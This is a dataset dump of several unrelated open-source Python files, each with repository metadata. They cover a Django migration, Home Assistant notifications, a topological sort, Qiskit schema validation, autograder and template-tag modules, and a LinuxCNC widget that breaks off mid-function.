beni55/djangolint | project/lint/migrations/0002_auto__add_fix.py | 2 | 2293 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Fix'
db.create_table('lint_fix', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('report', self.gf('django.db.models.fields.related.ForeignKey')(related_name='fixes', to=orm['lint.Report'])),
('path', self.gf('django.db.models.fields.CharField')(max_length=255)),
('line', self.gf('django.db.models.fields.PositiveIntegerField')()),
('source', self.gf('django.db.models.fields.TextField')()),
('error', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('lint', ['Fix'])
def backwards(self, orm):
# Deleting model 'Fix'
db.delete_table('lint_fix')
models = {
'lint.fix': {
'Meta': {'object_name': 'Fix'},
'error': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.PositiveIntegerField', [], {}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'report': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fixes'", 'to': "orm['lint.Report']"}),
'source': ('django.db.models.fields.TextField', [], {})
},
'lint.report': {
'Meta': {'ordering': "['-created']", 'object_name': 'Report'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stage': ('django.db.models.fields.CharField', [], {'default': "'waiting'", 'max_length': '10'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['lint']
| isc | 781,272,958,794,556,400 | 44.86 | 130 | 0.549935 | false |
fbradyirl/home-assistant | homeassistant/components/persistent_notification/__init__.py | 1 | 6944 | """Support for displaying persistent notifications."""
from collections import OrderedDict
import logging
from typing import Awaitable
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
ATTR_CREATED_AT = "created_at"
ATTR_MESSAGE = "message"
ATTR_NOTIFICATION_ID = "notification_id"
ATTR_TITLE = "title"
ATTR_STATUS = "status"
DOMAIN = "persistent_notification"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
EVENT_PERSISTENT_NOTIFICATIONS_UPDATED = "persistent_notifications_updated"
SERVICE_CREATE = "create"
SERVICE_DISMISS = "dismiss"
SERVICE_MARK_READ = "mark_read"
SCHEMA_SERVICE_CREATE = vol.Schema(
{
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_TITLE): cv.template,
vol.Optional(ATTR_NOTIFICATION_ID): cv.string,
}
)
SCHEMA_SERVICE_DISMISS = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
SCHEMA_SERVICE_MARK_READ = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
DEFAULT_OBJECT_ID = "notification"
_LOGGER = logging.getLogger(__name__)
STATE = "notifying"
STATUS_UNREAD = "unread"
STATUS_READ = "read"
WS_TYPE_GET_NOTIFICATIONS = "persistent_notification/get"
SCHEMA_WS_GET = websocket_api.BASE_COMMAND_MESSAGE_SCHEMA.extend(
{vol.Required("type"): WS_TYPE_GET_NOTIFICATIONS}
)
@bind_hass
def create(hass, message, title=None, notification_id=None):
"""Generate a notification."""
hass.add_job(async_create, hass, message, title, notification_id)
@bind_hass
def dismiss(hass, notification_id):
"""Remove a notification."""
hass.add_job(async_dismiss, hass, notification_id)
@callback
@bind_hass
def async_create(
hass: HomeAssistant, message: str, title: str = None, notification_id: str = None
) -> None:
"""Generate a notification."""
data = {
key: value
for key, value in [
(ATTR_TITLE, title),
(ATTR_MESSAGE, message),
(ATTR_NOTIFICATION_ID, notification_id),
]
if value is not None
}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_CREATE, data))
@callback
@bind_hass
def async_dismiss(hass: HomeAssistant, notification_id: str) -> None:
"""Remove a notification."""
data = {ATTR_NOTIFICATION_ID: notification_id}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_DISMISS, data))
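# Illustrative usage sketch (added; not part of the original integration): how
# another component could raise and later clear a notification. ``hass`` is a
# running HomeAssistant instance; the id and text below are placeholders.
def _example_notification_flow(hass):
    create(hass, "Backup finished without errors", title="Backup",
           notification_id="backup_state")
    dismiss(hass, "backup_state")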
async def async_setup(hass: HomeAssistant, config: dict) -> Awaitable[bool]:
"""Set up the persistent notification component."""
persistent_notifications = OrderedDict()
hass.data[DOMAIN] = {"notifications": persistent_notifications}
@callback
def create_service(call):
"""Handle a create notification service call."""
title = call.data.get(ATTR_TITLE)
message = call.data.get(ATTR_MESSAGE)
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
if notification_id is not None:
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
else:
entity_id = async_generate_entity_id(
ENTITY_ID_FORMAT, DEFAULT_OBJECT_ID, hass=hass
)
notification_id = entity_id.split(".")[1]
attr = {}
if title is not None:
try:
title.hass = hass
title = title.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering title %s: %s", title, ex)
title = title.template
attr[ATTR_TITLE] = title
try:
message.hass = hass
message = message.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering message %s: %s", message, ex)
message = message.template
attr[ATTR_MESSAGE] = message
hass.states.async_set(entity_id, STATE, attr)
# Store notification and fire event
# This will eventually replace state machine storage
persistent_notifications[entity_id] = {
ATTR_MESSAGE: message,
ATTR_NOTIFICATION_ID: notification_id,
ATTR_STATUS: STATUS_UNREAD,
ATTR_TITLE: title,
ATTR_CREATED_AT: dt_util.utcnow(),
}
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def dismiss_service(call):
"""Handle the dismiss notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
return
hass.states.async_remove(entity_id)
del persistent_notifications[entity_id]
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def mark_read_service(call):
"""Handle the mark_read notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
_LOGGER.error(
"Marking persistent_notification read failed: "
"Notification ID %s not found.",
notification_id,
)
return
persistent_notifications[entity_id][ATTR_STATUS] = STATUS_READ
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
hass.services.async_register(
DOMAIN, SERVICE_CREATE, create_service, SCHEMA_SERVICE_CREATE
)
hass.services.async_register(
DOMAIN, SERVICE_DISMISS, dismiss_service, SCHEMA_SERVICE_DISMISS
)
hass.services.async_register(
DOMAIN, SERVICE_MARK_READ, mark_read_service, SCHEMA_SERVICE_MARK_READ
)
hass.components.websocket_api.async_register_command(
WS_TYPE_GET_NOTIFICATIONS, websocket_get_notifications, SCHEMA_WS_GET
)
return True
@callback
def websocket_get_notifications(
hass: HomeAssistant, connection: websocket_api.ActiveConnection, msg
):
"""Return a list of persistent_notifications."""
connection.send_message(
websocket_api.result_message(
msg["id"],
[
{
key: data[key]
for key in (
ATTR_NOTIFICATION_ID,
ATTR_MESSAGE,
ATTR_STATUS,
ATTR_TITLE,
ATTR_CREATED_AT,
)
}
for data in hass.data[DOMAIN]["notifications"].values()
],
)
)
| apache-2.0 | 7,887,698,443,924,102,000 | 30 | 86 | 0.639401 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/util/topsort.py | 1 | 7495 | """
Topological sort.
From Tim Peters, see:
http://mail.python.org/pipermail/python-list/1999-July/006660.html
topsort takes a list of pairs, where each pair (x, y) is taken to
mean that x <= y wrt some abstract partial ordering. The return
value is a list, representing a total ordering that respects all
the input constraints.
E.g.,
topsort( [(1,2), (3,3)] )
Valid topological sorts would be any of (but nothing other than)
[3, 1, 2]
[1, 3, 2]
[1, 2, 3]
... however this variant ensures that 'key' order (first element of
tuple) is preserved, so the following will be the result returned:
[1, 3, 2]
because those are the permutations of the input elements that
respect the "1 precedes 2" and "3 precedes 3" input constraints.
Note that a constraint of the form (x, x) is really just a trick
to make sure x appears *somewhere* in the output list.
If there's a cycle in the constraints, say
topsort( [(1,2), (2,1)] )
then CycleError is raised, and the exception object supports
many methods to help analyze and break the cycles. This requires
a good deal more code than topsort itself!
"""
from galaxy.util.odict import odict as OrderedDict
from exceptions import Exception
class CycleError(Exception):
def __init__(self, sofar, numpreds, succs):
Exception.__init__(self, "cycle in constraints",
sofar, numpreds, succs)
self.preds = None
# return as much of the total ordering as topsort was able to
# find before it hit a cycle
def get_partial(self):
return self[1]
# return remaining elt -> count of predecessors map
def get_pred_counts(self):
return self[2]
# return remaining elt -> list of successors map
def get_succs(self):
return self[3]
# return remaining elements (== those that don't appear in
# get_partial())
def get_elements(self):
return self.get_pred_counts().keys()
# Return a list of pairs representing the full state of what's
# remaining (if you pass this list back to topsort, it will raise
# CycleError again, and if you invoke get_pairlist on *that*
# exception object, the result will be isomorphic to *this*
# invocation of get_pairlist).
# The idea is that you can use pick_a_cycle to find a cycle,
# through some means or another pick an (x,y) pair in the cycle
# you no longer want to respect, then remove that pair from the
# output of get_pairlist and try topsort again.
def get_pairlist(self):
succs = self.get_succs()
answer = []
for x in self.get_elements():
if succs.has_key(x):
for y in succs[x]:
answer.append( (x, y) )
else:
# make sure x appears in topsort's output!
answer.append( (x, x) )
return answer
# return remaining elt -> list of predecessors map
def get_preds(self):
if self.preds is not None:
return self.preds
self.preds = preds = OrderedDict()
remaining_elts = self.get_elements()
for x in remaining_elts:
preds[x] = []
succs = self.get_succs()
for x in remaining_elts:
if succs.has_key(x):
for y in succs[x]:
preds[y].append(x)
if __debug__:
for x in remaining_elts:
assert len(preds[x]) > 0
return preds
# return a cycle [x, ..., x] at random
def pick_a_cycle(self):
remaining_elts = self.get_elements()
# We know that everything in remaining_elts has a predecessor,
# but don't know that everything in it has a successor. So
# crawling forward over succs may hit a dead end. Instead we
# crawl backward over the preds until we hit a duplicate, then
# reverse the path.
preds = self.get_preds()
from random import choice
x = choice(remaining_elts)
answer = []
index = OrderedDict()
in_answer = index.has_key
while not in_answer(x):
index[x] = len(answer) # index of x in answer
answer.append(x)
x = choice(preds[x])
answer.append(x)
answer = answer[index[x]:]
answer.reverse()
return answer
def topsort(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
# suck up everything without a predecessor
answer = filter(lambda x, numpreds=numpreds: numpreds[x] == 0,
numpreds.keys())
# for everything in answer, knock down the pred count on
# its successors; note that answer grows *in* the loop
for x in answer:
assert numpreds[x] == 0
del numpreds[x]
if successors.has_key(x):
for y in successors[x]:
numpreds[y] = numpreds[y] - 1
if numpreds[y] == 0:
answer.append(y)
# following "del" isn't needed; just makes
# CycleError details easier to grasp
del successors[x]
if numpreds:
# everything in numpreds has at least one predecessor ->
# there's a cycle
if __debug__:
for x in numpreds.keys():
assert numpreds[x] > 0
raise CycleError(answer, numpreds, successors)
return answer
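# Illustrative usage sketch (added): the pairs encode "1 precedes 2" and
# "3 must appear somewhere"; key order is preserved, as described in the
# module docstring above.
def _example_topsort():
    assert topsort([(1, 2), (3, 3)]) == [1, 3, 2]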
def topsort_levels(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
answer = []
while 1:
# Suck up everything without a predecessor.
levparents = [x for x in numpreds.keys() if numpreds[x] == 0]
if not levparents:
break
answer.append( levparents )
for levparent in levparents:
del numpreds[levparent]
if successors.has_key(levparent):
for levparentsucc in successors[levparent]:
numpreds[levparentsucc] -= 1
del successors[levparent]
if numpreds:
        # Everything left in numpreds has at least one predecessor ->
        # there's a cycle.
raise CycleError( answer, numpreds, successors )
return answer
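# Illustrative usage sketch (added): elements with no ordering constraint between
# them land in the same level.
def _example_topsort_levels():
    assert topsort_levels([(1, 2), (1, 3), (2, 4), (3, 4)]) == [[1], [2, 3], [4]]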
| gpl-3.0 | -1,747,945,830,861,587,700 | 32.311111 | 70 | 0.598799 | false |
QISKit/qiskit-sdk-py | qiskit/validation/jsonschema/schema_validation.py | 1 | 7210 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Validation module for validation against JSON schemas."""
import json
import os
import logging
import jsonschema
from .exceptions import SchemaValidationError, _SummaryValidationError
logger = logging.getLogger(__name__)
_DEFAULT_SCHEMA_PATHS = {
'backend_configuration': 'schemas/backend_configuration_schema.json',
'backend_properties': 'schemas/backend_properties_schema.json',
'backend_status': 'schemas/backend_status_schema.json',
'default_pulse_configuration': 'schemas/default_pulse_configuration_schema.json',
'job_status': 'schemas/job_status_schema.json',
'qobj': 'schemas/qobj_schema.json',
'result': 'schemas/result_schema.json'}
# Schema and Validator storage
_SCHEMAS = {}
_VALIDATORS = {}
def _load_schema(file_path, name=None):
"""Loads the QObj schema for use in future validations.
Caches schema in _SCHEMAS module attribute.
Args:
file_path(str): Path to schema.
        name(str): Given name for schema. Defaults to the file_path filename
            without its extension.
Return:
schema(dict): Loaded schema.
"""
if name is None:
# filename without extension
name = os.path.splitext(os.path.basename(file_path))[0]
if name not in _SCHEMAS:
with open(file_path, 'r') as schema_file:
_SCHEMAS[name] = json.load(schema_file)
return _SCHEMAS[name]
def _get_validator(name, schema=None, check_schema=True,
validator_class=None, **validator_kwargs):
"""Generate validator for JSON schema.
Args:
name (str): Name for validator. Will be validator key in
`_VALIDATORS` dict.
schema (dict): JSON schema `dict`. If not provided searches for schema
in `_SCHEMAS`.
check_schema (bool): Verify schema is valid.
validator_class (jsonschema.IValidator): jsonschema IValidator instance.
Default behavior is to determine this from the schema `$schema`
field.
**validator_kwargs: Additional keyword arguments for validator.
Return:
jsonschema.IValidator: Validator for JSON schema.
Raises:
SchemaValidationError: Raised if validation fails.
"""
if schema is None:
try:
schema = _SCHEMAS[name]
except KeyError:
raise SchemaValidationError("Valid schema name or schema must "
"be provided.")
if name not in _VALIDATORS:
# Resolve JSON spec from schema if needed
if validator_class is None:
validator_class = jsonschema.validators.validator_for(schema)
# Generate and store validator in _VALIDATORS
_VALIDATORS[name] = validator_class(schema, **validator_kwargs)
if check_schema:
_VALIDATORS[name].check_schema(schema)
validator = _VALIDATORS[name]
return validator
def _load_schemas_and_validators():
"""Load all default schemas into `_SCHEMAS`."""
schema_base_path = os.path.join(os.path.dirname(__file__), '../..')
for name, path in _DEFAULT_SCHEMA_PATHS.items():
_load_schema(os.path.join(schema_base_path, path), name)
_get_validator(name)
# Load all schemas on import
_load_schemas_and_validators()
def validate_json_against_schema(json_dict, schema,
err_msg=None):
"""Validates JSON dict against a schema.
Args:
json_dict (dict): JSON to be validated.
schema (dict or str): JSON schema dictionary or the name of one of the
standards schemas in Qiskit to validate against it. The list of
standard schemas is: ``backend_configuration``,
``backend_properties``, ``backend_status``,
``default_pulse_configuration``, ``job_status``, ``qobj``,
``result``.
err_msg (str): Optional error message.
Raises:
SchemaValidationError: Raised if validation fails.
"""
try:
if isinstance(schema, str):
schema_name = schema
schema = _SCHEMAS[schema_name]
validator = _get_validator(schema_name)
validator.validate(json_dict)
else:
jsonschema.validate(json_dict, schema)
except jsonschema.ValidationError as err:
if err_msg is None:
err_msg = "JSON failed validation. Set Qiskit log level to DEBUG " \
"for further information."
newerr = SchemaValidationError(err_msg)
newerr.__cause__ = _SummaryValidationError(err)
logger.debug('%s', _format_causes(err))
raise newerr
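# Illustrative usage sketch (added; not part of the original module): validating a
# dictionary against one of the bundled standard schemas. ``qobj_dict`` is a
# placeholder for an already-serialized Qobj.
def _example_validate(qobj_dict):
    validate_json_against_schema(
        qobj_dict, "qobj", err_msg="Qobj failed schema validation.")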
def _format_causes(err, level=0):
"""Return a cascading explanation of the validation error.
Returns a cascading explanation of the validation error in the form of::
<validator> failed @ <subfield_path> because of:
<validator> failed @ <subfield_path> because of:
...
<validator> failed @ <subfield_path> because of:
...
...
For example::
'oneOf' failed @ '<root>' because of:
'required' failed @ '<root>.config' because of:
'meas_level' is a required property
Meaning the validator 'oneOf' failed while validating the whole object
because of the validator 'required' failing while validating the property
'config' because its 'meas_level' field is missing.
The cascade repeats the format "<validator> failed @ <path> because of"
until there are no deeper causes. In this case, the string representation
of the error is shown.
Args:
err (jsonschema.ValidationError): the instance to explain.
level (int): starting level of indentation for the cascade of
explanations.
Return:
str: a formatted string with the explanation of the error.
"""
lines = []
def _print(string, offset=0):
lines.append(_pad(string, offset=offset))
def _pad(string, offset=0):
padding = ' ' * (level + offset)
padded_lines = [padding + line for line in string.split('\n')]
return '\n'.join(padded_lines)
def _format_path(path):
def _format(item):
if isinstance(item, str):
return '.{}'.format(item)
return '[{}]'.format(item)
return ''.join(['<root>'] + list(map(_format, path)))
_print('\'{}\' failed @ \'{}\' because of:'.format(
err.validator, _format_path(err.absolute_path)))
if not err.context:
_print(str(err.message), offset=1)
else:
for suberr in err.context:
lines.append(_format_causes(suberr, level+1))
return '\n'.join(lines)
| apache-2.0 | 3,412,556,992,353,730,600 | 32.534884 | 85 | 0.629681 | false |
crscardellino/thesis | thesis/scripts/unlabeled_corpora_meta.py | 1 | 1429 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
from functools import partial
from multiprocessing import Pool
from tabulate import tabulate
from thesis.utils import find
def process_file(ifile, meta):
print('Processing %s' % ifile, file=sys.stderr)
basename = os.path.basename(ifile)
ofile = os.path.join(args.output, basename)
with open(ifile, 'r') as fin, open(ofile, 'w') as fout:
sentence = []
sentences = 0
for line in fin:
line = line.strip().split()
if not line and sentence:
print('META:%s sentence:%05d file:%s words:%03d'
% (meta, sentences, basename, len(sentence)), file=fout)
print(tabulate(sentence, tablefmt='plain'), end='\n\n', file=fout)
sentence = []
sentences += 1
elif line:
sentence.append(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
parser.add_argument('meta')
parser.add_argument('--pattern', default='*')
parser.add_argument('--workers', type=int, default=12)
args = parser.parse_args()
with Pool(args.workers) as p:
p.map(partial(process_file, meta=args.meta), find(args.input, args.pattern))
| mit | -7,308,446,227,549,357,000 | 28.163265 | 84 | 0.604619 | false |
maxspad/MGrader | autograder/modules/questions/PythonQuestion.py | 1 | 2436 | '''
Contains the PythonQuestion class, which is an instructor-facing
question type that implements a grade() function.
All instructor-facing Question modules must implement
a grade() function at module level that returns a Result object.
@author: Max Spadafore
'''
from AbstractQuestion import AbstractQ
table_name = 'grades_python'
f_uname = 'uname'
f_ptspos = 'ptspos'
f_ptsrec = 'ptsrec'
f_timestamp = 'timestamp_unix'
TABLE_CREATE = '''CREATE TABLE {0}
({1} TEXT PRIMARY KEY NOT NULL,
{2} INTEGER NOT NULL,
{3} INTEGER NOT NULL,
{4} INTEGER NOT NULL)'''.format(table_name, f_uname, f_ptspos, f_ptsrec, f_timestamp)
def initialize():
'''import autograder.modules.Database as dbm
db = dbm.DAL(connect=True)
db.createTable(TABLE_CREATE)
db.disconnect()'''
def process_cmd(cmdstr, args):
raise NotImplementedError
def grade(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=None, target=None):
'''
    Called by the GSM after dynamic import. Takes its parameters, acts on them if it wishes, and passes them along to the
    PythonQ class, which handles them. It then calls the PythonQ grade() function and returns its Result object.
@return: The Result object representing the result of the question's grading.
'''
question = PythonQ(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=makefile, maketarget=target)
return question.grade()
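# Illustrative call sketch (added; every value below is a hypothetical placeholder --
# the real GSM supplies these from its test-case configuration):
#
#   result = grade(uname="student1", assigname="hw1", tcname="case1",
#                  inputs="case1.in", outputs="case1.out", insprog="solution.py",
#                  rtimeout=10, ctimeout=10, diffcmd="diff", runcmd="python student.py",
#                  makefile=None, target=None)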
class PythonQ(AbstractQ):
'''
An instructor-facing Question grading class designed to grade python programs.
Utilizes functions from AbstractQ
@see: AbstractQ
'''
def grade(self):
# move to student dir
self.chdirToStudent()
# Run (AbstractQuestion)
self.openFiles('student')
result = self.runStudentCode()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
self.chdirToInstructor()
self.openFiles('instructor')
self.runInstructorCode()
result = self.compareOutputs()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
return self.passStudent()
def getQType(self):
return 'PythonQuestion' | bsd-3-clause | 555,966,247,296,795,100 | 31.932432 | 149 | 0.688013 | false |
siggame/webserver | webserver/hermes/templatetags/hermes_tags.py | 1 | 3396 | from django import template
from django.template.defaultfilters import stringfilter
from competition.models.game_model import Game
import slumber
import datetime
import logging
import requests
logger = logging.getLogger(__name__)
register = template.Library()
@register.filter
@stringfilter
def iso_to_datetime(value):
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")
except ValueError:
pass
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
return ""
@register.assignment_tag
def centered_list(value, center=None, size=None):
if size is None or center is None:
return value
if len(value) == 0:
return value
size = int(size)
start = center - size / 2 - 1
stop = center + size / 2
if start < 0:
stop = size
start = 0
if stop >= len(value):
start = len(value) - size
stop = len(value)
return value[start:stop]
class CheckEmbargoedNode(template.Node):
def __init__(self, team, variable_name):
self.team = team
self.variable_name = variable_name
def render(self, context):
team = context[self.team]
try:
# Get the last game played
last_game = team.game_set.latest()
# Grab the API url from the last Game that was played
url = last_game.data['api_url']
# Query API
response = slumber.API(url).client.get(name=team.slug)
# Make sure that we only get one client item back.
assert response['meta']['total_count'] == 1
# Get "embargoed" from returned client
if response['objects'][0]['embargoed']:
result = "embargoed"
else:
result = "unembargoed"
except Game.DoesNotExist:
result = "not ready"
except slumber.exceptions.ImproperlyConfigured:
result = "error"
logger.error("Bad arena URL: {}".format(url))
except (TypeError, KeyError), e:
result = "error"
logger.error("Error grabbing game data: {}".format(str(e)))
except slumber.exceptions.HttpClientError:
result = "error"
logger.error("Couldn't connect to arena api ({})".format(url))
except slumber.exceptions.HttpServerError:
result = "error"
logger.error("Arena server error ({})".format(url))
except requests.exceptions.ConnectionError:
result = "error"
logger.error("Connection to arena api timed out ({})".format(url))
except AssertionError:
result = "error"
if response['meta']['total_count'] > 1:
msg = 'Found more than one team with slug "{}" in arena'
else:
msg = 'Found zero teams with slug "{}" in arena'
logger.error(msg.format(team.slug))
context[self.variable_name] = result
return ""
@register.tag
def check_embargoed(parser, token):
try:
tag_name, team, _as, variable = token.split_contents()
except ValueError:
tag_name = token.contents.split()[0]
msg = '{0} should be "{0} <team> as <variable>"'
raise template.TemplateSyntaxError(msg.format(tag_name))
return CheckEmbargoedNode(team, variable)
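# Illustrative template usage (added; assumes the library is loaded with
# ``{% load hermes_tags %}`` and that ``team`` / ``rankings`` exist in the context):
#
#   {{ team.updated|iso_to_datetime }}
#   {% centered_list rankings team.rank 10 as window %}
#   {% check_embargoed team as embargo_status %}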
| bsd-3-clause | -4,488,372,421,264,011,300 | 29.594595 | 78 | 0.5904 | false |
ianmcmahon/linuxcnc-mirror | lib/python/gladevcp/hal_gremlin.py | 1 | 9842 | #!/usr/bin/env python
# vim: sts=4 sw=4 et
# GladeVcp Widgets
#
# Copyright (c) 2010 Pavel Shramov <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os
import gtk, gobject
import linuxcnc
import gremlin
import rs274.glcanon
import gcode
from hal_actions import _EMC_ActionBase
from hal_glib import GStat
class HAL_Gremlin(gremlin.Gremlin, _EMC_ActionBase):
__gtype_name__ = "HAL_Gremlin"
__gproperties__ = {
'view' : ( gobject.TYPE_STRING, 'View type', 'Default view: p, x, y, y2, z, z2',
'p', gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'enable_dro' : ( gobject.TYPE_BOOLEAN, 'Enable DRO', 'Show DRO on graphics',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'metric_units' : ( gobject.TYPE_BOOLEAN, 'Use Metric Units', 'Show DRO in metric or imperial units',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_relative' : ( gobject.TYPE_BOOLEAN, 'Show Relative', 'Show DRO relative to active system or machine origin',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_commanded' : ( gobject.TYPE_BOOLEAN, 'Show Commanded', 'Show commanded or actual position',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_extents_option' : ( gobject.TYPE_BOOLEAN, 'Show Extents', 'Show machine extents',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_limits' : ( gobject.TYPE_BOOLEAN, 'Show limits', 'Show machine limits',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_live_plot' : ( gobject.TYPE_BOOLEAN, 'Show live plot', 'Show machine plot',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_velocity' : ( gobject.TYPE_BOOLEAN, 'Show tool speed', 'Show tool velocity',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_program' : ( gobject.TYPE_BOOLEAN, 'Show program', 'Show program',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_rapids' : ( gobject.TYPE_BOOLEAN, 'Show rapids', 'Show rapid moves',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_tool' : ( gobject.TYPE_BOOLEAN, 'Show tool', 'Show tool',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_dtg' : ( gobject.TYPE_BOOLEAN, 'Show DTG', 'Show Distance To Go',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_lathe_radius' : ( gobject.TYPE_BOOLEAN, 'Show Lathe Radius', 'Show X axis in Radius',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'grid_size' : ( gobject.TYPE_FLOAT, 'Grid Size', 'Grid Size',
0, 100, 0, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_joints_mode' : ( gobject.TYPE_BOOLEAN, 'Use joints mode', 'Use joints mode',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_default_controls' : ( gobject.TYPE_BOOLEAN, 'Use Default Mouse Controls', 'Use Default Mouse Controls',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
}
__gproperties = __gproperties__
def __init__(self, *a, **kw):
inifile = os.environ.get('INI_FILE_NAME', '/dev/null')
inifile = linuxcnc.ini(inifile)
gremlin.Gremlin.__init__(self, inifile)
self.gstat = GStat()
self.gstat.connect('file-loaded', self.fileloaded)
self.show()
def fileloaded(self,w,f):
try:
self._load(f)
except AttributeError,detail:
#AttributeError: 'NoneType' object has no attribute 'gl_end'
print 'hal_gremlin: continuing after',detail
def do_get_property(self, property):
name = property.name.replace('-', '_')
if name == 'view':
return self.current_view
elif name in self.__gproperties.keys():
return getattr(self, name)
else:
raise AttributeError('unknown property %s' % property.name)
def do_set_property(self, property, value):
name = property.name.replace('-', '_')
if name == 'view':
view = value.lower()
if self.lathe_option:
if view not in ['p','y','y2']:
return False
elif view not in ['p', 'x', 'y', 'z', 'z2']:
return False
self.current_view = view
if self.initialised:
self.set_current_view()
elif name == 'enable_dro':
self.enable_dro = value
elif name == 'metric_units':
self.metric_units = value
elif name in self.__gproperties.keys():
setattr(self, name, value)
else:
raise AttributeError('unknown property %s' % property.name)
self.queue_draw()
return True
    # This overrides the glcanon.py method so we can change the DRO
def dro_format(self,s,spd,dtg,limit,homed,positions,axisdtg,g5x_offset,g92_offset,tlo_offset):
if not self.enable_dro:
return limit, homed, [''], ['']
if self.metric_units:
format = "% 6s:% 9.3f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.3f"
else:
droformat = " " + format
